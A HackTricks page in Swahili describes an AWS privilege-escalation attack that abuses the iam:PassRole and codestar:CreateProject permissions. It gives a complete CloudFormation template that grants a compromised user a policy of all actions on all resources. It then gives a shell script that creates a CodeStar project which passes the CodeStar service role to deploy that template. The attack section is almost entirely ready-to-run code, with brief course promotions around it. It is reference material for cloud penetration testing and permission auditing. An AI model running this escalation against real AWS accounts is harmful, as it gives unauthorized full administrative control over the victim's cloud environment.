iam:PassRole, codestar:CreateProject

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kwa ruhusa hizi unaweza kutumia jukumu la IAM la codestar kufanya vitendo vya kupindukia kupitia template ya cloudformation.

Kutumia hii unahitaji kuunda S3 bucket inayopatikana kutoka kwenye akaunti iliyoshambuliwa. Pakia faili iliyoitwa toolchain.json. Faili hii inapaswa kuwa na template ya cloudformation ya kudukua. Iliyofuata inaweza kutumika kuweka sera iliyosimamiwa kwa mtumiaji chini ya udhibiti wako na kumpa ruhusa za msimamizi:

toolchain.json
{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}

Pia pakia faili hii ya zip tupu kwenye bucket:

Kumbuka kwamba bucket na faili zote mbili lazima ziweze kufikiwa na akaunti ya muathirika.

Baada ya kupakia vitu vyote viwili, unaweza sasa kuendelea na kuexploit kwa kuanzisha mradi wa codestar:

PROJECT_NAME="supercodestar"

# Crecte the source JSON
## In this JSON the bucket and key (path) to the empry.zip file is used
SOURCE_CODE_PATH="/tmp/surce_code.json"
SOURCE_CODE="[
{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"empty.zip\"
}
},
\"destination\": {
\"codeCommit\": {
\"name\": \"$PROJECT_NAME\"
}
}
}
]"
printf "$SOURCE_CODE" > $SOURCE_CODE_PATH

# Create the toolchain JSON
## In this JSON the bucket and key (path) to the toolchain.json file is used
TOOLCHAIN_PATH="/tmp/tool_chain.json"
TOOLCHAIN="{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"toolchain.json\"
}
},
\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
}"
printf "$TOOLCHAIN" > $TOOLCHAIN_PATH

# Create the codestar project that will use the cloudformation epxloit to privesc
aws codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME \
--source-code file://$SOURCE_CODE_PATH \
--toolchain file://$TOOLCHAIN_PATH

Hili shambulio linategemea shambulio la Pacu la mamlaka hizi: https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997 Kwenye hiyo unaweza kupata tofauti ya kuunda sera iliyosimamiwa na msimamizi kwa jukumu badala ya mtumiaji.

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated